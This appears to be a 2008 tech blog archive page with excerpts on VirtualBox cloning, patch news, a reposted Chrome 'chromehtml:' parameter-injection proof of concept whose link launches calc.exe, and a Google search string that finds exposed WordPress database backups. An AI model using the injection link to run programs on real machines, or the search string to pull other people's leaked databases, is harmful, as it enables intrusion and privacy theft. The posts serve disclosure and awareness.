Monday, December 29th, 2008
I found out the hard way that you cannot simply copy and paste your .vdi file, rename, and add a second virtual machine to your system. Each VDI file has a unique UUID that a single VirtualBox installation will not duplicate. You have to "clone" it. The screenshot below is ...
Posted in General BS, Hardware, Linux, Networking, Software | No Comments
Tuesday, December 23rd, 2008
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html
click the following link with IE while monitoring with procmon
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
Source:
http://www.milw0rm.com/exploits/7566
Posted in Coding, Internet, Security, Software | No Comments
Monday, December 22nd, 2008
Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line.
The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine ...
Posted in Coding, Internet, Networking, Privacy, Security, Software, Windows | No Comments
Wednesday, December 17th, 2008
Mozilla has issued eight patches for its Firefox Web browser, three of which fix problems classified as critical.
The patches come after security experts have recommended using a browser other than Microsoft's Internet Explorer 7 and older versions of IE due to a dangerous vulnerability. Microsoft is due to release an ...
Posted in Internet, Security, Software | No Comments
Sunday, December 14th, 2008
Older versions of the popular WordPress plugin WP-DB-Backup leave a copy of your entire database in a public folder for all to see. The databases were stored in wp-content/backup/ and a quick Google search today still returns many databases of sites, including some as recent as a few days ago:
http://www.google.com/search?num=100&hl=en&suggon=0&safe=off&q=intitle%3A%22index+of+%2Fwp-content%2Fbackup%22&btnG=Search
For ...
Posted in Coding, Internet, Privacy, Security, Software | No Comments